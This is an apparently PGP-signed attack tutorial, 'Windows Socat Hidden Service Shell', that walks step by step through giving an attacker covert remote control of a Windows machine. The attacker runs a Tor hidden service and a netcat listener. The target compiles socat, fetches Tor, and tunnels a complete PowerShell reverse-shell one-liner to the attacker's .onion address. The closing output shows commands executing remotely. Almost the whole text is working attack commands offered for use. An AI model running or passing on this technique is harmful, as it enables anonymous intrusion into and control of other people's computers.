Windows Socat Hidden Service Shell

1. -----BEGIN PGP SIGNED MESSAGE-----
2. Hash: SHA512
3.  
4.  ___________________________________
5. / Vegeta_Ssj : Windows Socat Hidden \
6. \ Service Reverse Shell             /
7.  -----------------------------------
8.         \   ^__^
9.          \  (oo)\_______
10.             (__)\       )\/\
11.                 ||----w |
12.                 ||     ||
13.  
14. email: vegeta_ssj@riseup.net
15. jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion
16.  
17. Attacker (Linux):
18.  
19. Run Tor Hidden Service:
20.  
21. exploit@cockbox:~# sudo cat /etc/tor/torrc
22.  
23. HiddenServiceDir /home/exploit/hidden_shell
24. HiddenServicePort 8888 127.0.0.1:8888
25.  
26. exploit@cockbox:~# tor
27.  
28. Jun 27 17:14:46.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
29. Jun 27 17:14:47.000 [notice] Bootstrapped 100%: Done
30.  
31. exploit@cockbox:~# cat /home/exploit/hidden_shell/hostname
32. 63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion
33.  
34. Run Netcat listener:
35.  
36. exploit@cockbox:~# nc -lvp 8888 127.0.0.1
37. listening on [any] 8888 ...
38.  
39. Target:
40.  
41. Download Cygwin and install with additional packages:
42.  
43. https://www.cygwin.com/setup-x86_64.exe
44.  
45. - - - - - - - - - - - - - - - - - - - - gcc-g++
46. - - - - - - - - - - - - - - - - - - - - gcc-core
47. - - - - - - - - - - - - - - - - - - - - cygwin32-gcc-g++
48. - - - - - - - - - - - - - - - - - - - - cygwin32-gcc-core
49. - - - - - - - - - - - - - - - - - - - - make
50.  
51. Download Socat current version:
52.  
53. $url = "http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz";$output ="$pwd\socat.zip"
54. Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output
55.  
56. Open Cygwin and compile Socat under Windows:
57.  
58. tar zxvf socat-1.7.3.2.tar.gz
59. cd socat-1.7.3.2
60. ./configure
61. make
62. make install
63.  
64. Download and run Tor from Windows Expert Bundle:
65.  
66. $url = "https://www.torproject.org/dist/torbrowser/9.5/tor-win32-0.4.3.5.zip";$output ="$pwd\tor.zip"
67. Invoke-WebRequest -Uri $url -OutFile $output;Expand-Archive -LiteralPath $output
68.  
69. Run the Socat tunnel from the Hidden Service to the listening port on localhost:
70.  
71. socat.exe TCP4-LISTEN:5555,reuseaddr,fork SOCKS4A:127.0.0.1:63uxwd4p56vswvyj4gcwvxzkkxzwwtz4lr2yc6w2nwkeniefmhli7xid.onion:8888,socksport=9050
72.  
73. Send Powershell reverse shell to Socat listener on localhost:
74.  
75. $client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
76.  
77. Enjoy:
78.  
79. exploit@cockbox:~# nc -lvp 8888 127.0.0.1
80. listening on [any] 8888 ...
81. connect to [127.0.0.1] from localhost [127.0.0.1] 59496
82.  
83. PS C:\Users\IEUser> whoami
84. msedgewin10\ieuser
85.  
86. Enjoy :)
87. -----BEGIN PGP SIGNATURE-----
88.  
89. iQETBAEBCgB9FiEEdkePr+T8OnYM3UyACVTIwtMKCJYFAl8KQWdfFIAAAAAALgAo
90. aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDc2
91. NDc4RkFGRTRGQzNBNzYwQ0RENEM4MDA5NTRDOEMyRDMwQTA4OTYACgkQCVTIwtMK
92. CJbJlgQAh/6cS4lB3Jz1d2yxPwm334W990C4cmov9v+thlg/2Z9WYY8ecYRfD2GA
93. WPf/4oSfxcILrE2WnXeZctqPWtqVUAMsRRiWW1heFYZ/gnTU6wEAQelpoNXQRtxc
94. x+iPmTbkSc3K4/P4PwSTAwhorD89YaGoRKSotNmAaSeWBEFhUiA=
95. =8W4Z
96. -----END PGP SIGNATURE-----